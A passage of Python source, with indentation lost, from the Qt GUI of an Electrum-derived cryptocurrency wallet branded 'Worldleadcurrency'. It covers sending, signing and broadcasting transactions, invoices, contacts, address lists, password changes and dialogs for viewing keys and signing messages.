return self.payto_e.payto_address if self.payto_e.payto_address else self.wallet.dummy_address()
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs()
if not outputs:
addr = self.get_payto_or_dummy()
outputs = [(TYPE_ADDRESS, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
fee = None if self.not_enough_funds else self.wallet.get_tx_fee(tx)
self.fee_e.setAmount(fee)
def update_fee_edit(self):
b = self.config.get('can_edit_fees', False)
self.fee_e.setVisible(b)
self.fee_e_label.setVisible(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, domain = None):
self.pay_from = [] if domain == [] else self.wallet.get_spendable_coins(domain, height=self.network.get_local_height())
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:8] + '...' + h[-8:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, value = self.contacts.get(key)
return key + ' <' + value + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.use_encryption:
password = self.password_dialog(parent=parent)
try:
if password:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs()
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Worldleadcurrency Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Worldleadcurrency Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee = self.fee_e.get_amount()
if fee is None:
self.show_error(_('Invalid Fee'))
return
coins = self.get_coins()
return outputs, fee, label, coins
def do_send(self):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
amount = sum(map(lambda x:x[2], outputs))
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
if tx.get_fee() < self.wallet.relayfee() and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if self.show_before_broadcast():
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
confirm_amount = self.config.get('confirm_amount', COIN)
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
extra_fee = run_hook('get_additional_fee', self.wallet, tx)
if extra_fee:
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(extra_fee) )
if tx.get_fee() >= self.config.get('confirm_fee', 100000):
msg.append(_('Warning')+ ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.use_encryption:
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
if self.wallet.use_encryption and not password:
callback(False) # User cancelled password input
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
pr.set_paid(tx.hash())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.hash(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoices_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
dialog.exec_()
return clayout.selected_index()
def prepare_for_payment_request(self):
self.tabs.setCurrentIndex(1)
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoices_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid worldleadcurrency URI:') + '\n' + str(e))
return
self.tabs.setCurrentIndex(1)
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
l = MyTreeWidget(self, self.create_receive_menu, [ _('Address'), _('Label'), _('Balance'), _('Tx')], 1)
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.on_update = self.update_address_tab
self.address_list = l
return self.create_list_tab(l)
def create_contacts_tab(self):
l = MyTreeWidget(self, self.create_contact_menu, [_('Name'), _('Value'), _('Type')], 1, [0, 1])
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.setSortingEnabled(True)
l.on_edited = self.on_contact_edited
l.on_permit_edit = self.on_permit_contact_edit
l.on_update = self.update_contacts_tab
self.contacts_list = l
return self.create_list_tab(l)
def update_invoices_list(self):
inv_list = self.invoices.sorted_list()
l = self.invoices_list
l.clear()
for pr in inv_list:
key = pr.get_id()
status = self.invoices.get_status(key)
requestor = pr.get_requestor()
exp = pr.get_expiration_date()
date_str = util.format_time(exp) if exp else _('Never')
item = QTreeWidgetItem([date_str, requestor, pr.memo, self.format_amount(pr.get_amount(), whitespaces=True), pr_tooltips.get(status,'')])
item.setIcon(4, QIcon(pr_icons.get(status)))
item.setData(0, Qt.UserRole, key)
item.setFont(1, QFont(MONOSPACE_FONT))
item.setFont(3, QFont(MONOSPACE_FONT))
l.addTopLevelItem(item)
l.setCurrentItem(l.topLevelItem(0))
self.invoices_list.setVisible(len(inv_list))
self.invoices_label.setVisible(len(inv_list))
def delete_imported_key(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_imported_key(addr)
self.address_list.update()
self.history_list.update()
def edit_account_label(self, k):
text, ok = QInputDialog.getText(self, _('Rename account'), _('Name') + ':', text = self.wallet.labels.get(k,''))
if ok:
label = unicode(text)
self.wallet.set_label(k,label)
self.address_list.update()
def account_set_expanded(self, item, k, b):
item.setExpanded(b)
self.accounts_expanded[k] = b
def create_account_menu(self, position, k, item):
menu = QMenu()
exp = item.isExpanded()
menu.addAction(_("Minimize") if exp else _("Maximize"), lambda: self.account_set_expanded(item, k, not exp))
menu.addAction(_("Rename"), lambda: self.edit_account_label(k))
if self.wallet.seed_version > 4:
menu.addAction(_("View details"), lambda: self.show_account_details(k))
menu.exec_(self.address_list.viewport().mapToGlobal(position))
def create_receive_menu(self, position):
selected = self.address_list.selectedItems()
multi_select = len(selected) > 1
addrs = [unicode(item.text(0)) for item in selected]
if not multi_select:
item = self.address_list.itemAt(position)
if not item:
return
addr = addrs[0]
if not is_valid(addr):
k = str(item.data(0,32).toString())
if k:
self.create_account_menu(position, k, item)
else:
item.setExpanded(not item.isExpanded())
return
menu = QMenu()
if not multi_select:
menu.addAction(_("Copy to clipboard"), lambda: self.app.clipboard().setText(addr))
menu.addAction(_("Request payment"), lambda: self.receive_at(addr))
menu.addAction(_("Edit label"), lambda: self.address_list.editItem(item, self.address_list.editable_columns[0]))
menu.addAction(_('History'), lambda: self.show_address(addr))
menu.addAction(_('Public Keys'), lambda: self.show_public_keys(addr))
if self.wallet.can_export():
menu.addAction(_("Private key"), lambda: self.show_private_key(addr))
if not self.wallet.is_watching_only():
menu.addAction(_("Sign/verify message"), lambda: self.sign_verify_message(addr))
menu.addAction(_("Encrypt/decrypt message"), lambda: self.encrypt_message(addr))
if self.wallet.is_imported(addr):
menu.addAction(_("Remove from wallet"), lambda: self.delete_imported_key(addr))
addr_URL = block_explorer_URL(self.config, 'addr', addr)
if addr_URL:
menu.addAction(_("View on block explorer"), lambda: webbrowser.open(addr_URL))
if any(not self.wallet.is_frozen(addr) for addr in addrs):
menu.addAction(_("Freeze"), lambda: self.set_frozen_state(addrs, True))
if any(self.wallet.is_frozen(addr) for addr in addrs):
menu.addAction(_("Unfreeze"), lambda: self.set_frozen_state(addrs, False))
def can_send(addr):
return not self.wallet.is_frozen(addr) and sum(self.wallet.get_addr_balance(addr)[:2])
if any(can_send(addr) for addr in addrs):
menu.addAction(_("Send From"), lambda: self.send_from_addresses(addrs))
run_hook('receive_menu', menu, addrs, self.wallet)
menu.exec_(self.address_list.viewport().mapToGlobal(position))
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
domain = self.wallet.get_account_addresses(self.current_account)
return self.wallet.get_spendable_coins(domain, height=self.network.get_local_height())
def send_from_addresses(self, addrs):
self.set_pay_from(addrs)
self.tabs.setCurrentIndex(1)
self.update_fee()
def paytomany(self):
self.tabs.setCurrentIndex(1)
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.tabs.setCurrentIndex(1)
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def on_permit_contact_edit(self, item, column):
# openalias items shouldn't be editable
return item.text(2) != "openalias"
def on_contact_edited(self, item, column, prior):
if column == 0: # Remove old contact if renamed
self.contacts.pop(prior)
self.set_contact(unicode(item.text(0)), unicode(item.text(1)))
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contacts_list.update() # Displays original unchanged value
return False
self.contacts[label] = ('address', address)
self.contacts_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contacts_list.update()
self.update_completions()
def create_contact_menu(self, position):
menu = QMenu()
selected = self.contacts_list.selectedItems()
if not selected:
menu.addAction(_("New contact"), lambda: self.new_contact_dialog())
else:
labels = [unicode(item.text(0)) for item in selected]
addrs = [unicode(item.text(1)) for item in selected]
types = [unicode(item.text(2)) for item in selected]
menu.addAction(_("Copy to Clipboard"), lambda:
self.app.clipboard().setText('\n'.join(labels)))
menu.addAction(_("Pay to"), lambda: self.payto_contacts(labels))
menu.addAction(_("Delete"), lambda: self.delete_contacts(labels))
URLs = []
for (addr, _type) in zip(addrs, types):
if _type == 'address':
URLs.append(block_explorer_URL(self.config, 'addr', addr))
if URLs:
menu.addAction(_("View on block explorer"),
lambda: map(webbrowser.open, URLs))
run_hook('create_contact_menu', menu, selected)
menu.exec_(self.contacts_list.viewport().mapToGlobal(position))
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Expires") + ':'), 1, 0)
grid.addWidget(QLabel(format_time(pr.get_expiration_date())), 1, 1)
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
grid.addWidget(QLabel(_("Payment URL") + ':'), 4, 0)
grid.addWidget(QLabel(pr.payment_url), 4, 1)
grid.addWidget(QLabel(_("Outputs") + ':'), 5, 0)
outputs_str = '\n'.join(map(lambda x: x[1] + ' ' + self.format_amount(x[2])+ self.base_unit(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 5, 1)
if pr.tx:
grid.addWidget(QLabel(_("Transaction ID") + ':'), 6, 0)
l = QLineEdit(pr.tx)
l.setReadOnly(True)
grid.addWidget(l, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
return
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def invoices_list_menu(self, position):
item = self.invoices_list.itemAt(position)
if not item:
return
key = str(item.data(0, 32).toString())
pr = self.invoices.get(key)
status = self.invoices.get_status(key)
menu = QMenu()
menu.addAction(_("Details"), lambda: self.show_invoice(key))
if status == PR_UNPAID:
menu.addAction(_("Pay Now"), lambda: self.do_pay_invoice(key))
def delete_invoice(key):
self.invoices.remove(key)
self.invoices_list.update()
menu.addAction(_("Delete"), lambda: delete_invoice(key))
menu.exec_(self.invoices_list.viewport().mapToGlobal(position))
def update_address_tab(self):
l = self.address_list
item = l.currentItem()
current_address = item.data(0, Qt.UserRole).toString() if item else None
l.clear()
accounts = self.wallet.get_accounts()
if self.current_account is None:
account_items = sorted(accounts.items())
else:
account_items = [(self.current_account, accounts.get(self.current_account))]
for k, account in account_items:
if len(accounts) > 1:
name = self.wallet.get_account_name(k)
c, u, x = self.wallet.get_account_balance(k)
account_item = QTreeWidgetItem([ name, '', self.format_amount(c + u + x), ''])
account_item.setExpanded(self.accounts_expanded.get(k, True))
account_item.setData(0, Qt.UserRole, k)
l.addTopLevelItem(account_item)
else:
account_item = l
sequences = [0,1] if account.has_change() else [0]
for is_change in sequences:
if len(sequences) > 1:
name = _("Receiving") if not is_change else _("Change")
seq_item = QTreeWidgetItem( [ name, '', '', '', ''] )
account_item.addChild(seq_item)
if not is_change:
seq_item.setExpanded(True)
else:
seq_item = account_item
used_item = QTreeWidgetItem( [ _("Used"), '', '', '', ''] )
used_flag = False
addr_list = account.get_addresses(is_change)
for address in addr_list:
num = len(self.wallet.history.get(address,[]))
is_used = self.wallet.is_used(address)
label = self.wallet.labels.get(address,'')
c, u, x = self.wallet.get_addr_balance(address)
balance = self.format_amount(c + u + x)
item = QTreeWidgetItem([address, label, balance, "%d"%num])
item.setFont(0, QFont(MONOSPACE_FONT))
item.setData(0, Qt.UserRole, address)
item.setData(0, Qt.UserRole+1, True) # label can be edited
if self.wallet.is_frozen(address):
item.setBackgroundColor(0, QColor('lightblue'))
if self.wallet.is_beyond_limit(address, account, is_change):
item.setBackgroundColor(0, QColor('red'))
if is_used:
if not used_flag:
seq_item.insertChild(0, used_item)
used_flag = True
used_item.addChild(item)
else:
seq_item.addChild(item)
if address == current_address:
l.setCurrentItem(item)
def update_contacts_tab(self):
l = self.contacts_list
item = l.currentItem()
current_key = item.data(0, Qt.UserRole).toString() if item else None
l.clear()
for key in sorted(self.contacts.keys()):
_type, value = self.contacts[key]
item = QTreeWidgetItem([key, value, _type])
item.setData(0, Qt.UserRole, key)
l.addTopLevelItem(item)
if key == current_key:
l.setCurrentItem(item)
run_hook('update_contacts_tab', l)
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: apply( f, (method, args, self.password_dialog ))
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def change_account(self,s):
if s == _("All accounts"):
self.current_account = None
else:
accounts = self.wallet.get_account_names()
for k, v in accounts.items():
if v == s:
self.current_account = k
self.history_list.update()
self.update_status()
self.address_list.update()
self.receive_list.update()
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.account_selector = QComboBox()
self.account_selector.setSizeAdjustPolicy(QComboBox.AdjustToContents)
self.connect(self.account_selector, SIGNAL("activated(QString)"), self.change_account)
sb.addPermanentWidget(self.account_selector)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), self.run_network_dialog )
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.use_encryption else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.set_send_button_text()
def change_password_dialog(self):
from password_dialog import PasswordDialog, PW_CHANGE
msg = (_('Your wallet is encrypted. Use this dialog to change your '
'password. To disable wallet encryption, enter an empty new '
'password.') if self.wallet.use_encryption
else _('Your wallet keys are not encrypted'))
d = PasswordDialog(self, self.wallet, msg, PW_CHANGE)
ok, password, new_password = d.run()
if not ok:
return
try:
self.wallet.check_password(password)
except BaseException as e:
self.show_error(str(e))
return
try:
self.wallet.update_password(password, new_password)
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
if new_password:
msg = _('Password was updated successfully')
else:
msg = _('This wallet is not encrypted')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
i = self.tabs.currentIndex()
if i == 0:
self.history_list.filter(t, [2, 3, 4]) # Date, Description, Amount
elif i == 1:
self.invoices_list.filter(t, [0, 1, 2, 3]) # Date, Requestor, Description, Amount
elif i == 2:
self.receive_list.filter(t, [0, 1, 2, 3, 4]) # Date, Account, Address, Description, Amount
elif i == 3:
self.address_list.filter(t, [0,1, 2]) # Address, Label, Balance
elif i == 4:
self.contacts_list.filter(t, [0, 1]) # Key, Value
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
if self.set_contact(unicode(line2.text()), str(line1.text())):
self.tabs.setCurrentIndex(4)
def update_new_account_menu(self):
self.new_account_menu.setVisible(self.wallet.can_create_accounts())
self.new_account_menu.setEnabled(self.wallet.permit_account_naming())
self.update_account_selector()
def new_account_dialog(self):
dialog = WindowModalDialog(self, _("New Account Name"))
vbox = QVBoxLayout()
msg = _("Enter a name to give the account. You will not be "
"permitted to create further accounts until the new account "
"receives at least one transaction.") + "\n"
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
e = QLineEdit()
vbox.addWidget(e)
vbox.addLayout(Buttons(CancelButton(dialog), OkButton(dialog)))
dialog.setLayout(vbox)
if dialog.exec_():
self.wallet.set_label(self.wallet.last_account_id(), str(e.text()))
self.address_list.update()
self.tabs.setCurrentIndex(3)
self.update_new_account_menu()
def check_next_account(self):
if self.wallet.needs_next_account() and not self.checking_accounts:
self.checking_accounts = True
msg = _("All the accounts in your wallet have received "
"transactions. Electrum must check whether more "
"accounts exist; one will only be shown if "
"it has been used or you give it a name.")
self.show_message(msg, title=_("Check Accounts"))
self.create_next_account()
@protected
def create_next_account(self, password):
def on_done():
self.checking_accounts = False
self.update_new_account_menu()
task = partial(self.wallet.create_next_account, password)
self.wallet.thread.add(task, on_done=on_done)
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_dict = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
sorted_keys = sorted(mpk_dict.keys())
def show_mpk(index):
mpk_text.setText(mpk_dict[sorted_keys[index]])
# only show the combobox in case multiple accounts are available
if len(mpk_dict) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
is_mine = self.wallet.master_private_keys.has_key(key)
mine_text = [_("cosigner"), _("self")]
return "%s (%s)" % (key, mine_text[is_mine])
return key
labels = list(map(label, sorted_keys))
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels,
on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if self.wallet.use_encryption and password is None:
return # User cancelled password input
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
try:
mnemonic = self.wallet.get_mnemonic(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, mnemonic, self.wallet.has_imported_keys())
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
def show_public_keys(self, address):
if not address: return
try:
pubkey_list = self.wallet.get_public_keys(address)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Public key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
if isinstance(self.wallet, BIP32_RD_Wallet):
derivation = self.wallet.address_id(address)
vbox.addWidget(QLabel(_("Derivation") + ': ' + derivation))
vbox.addWidget(QLabel(_("Public key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pubkey_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address: return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
message = unicode(message.toPlainText()).encode('utf-8')
task = partial(self.wallet.sign_message, str(address.text()),
message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
message = unicode(message.toPlainText())
message = message.encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address.text(), sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
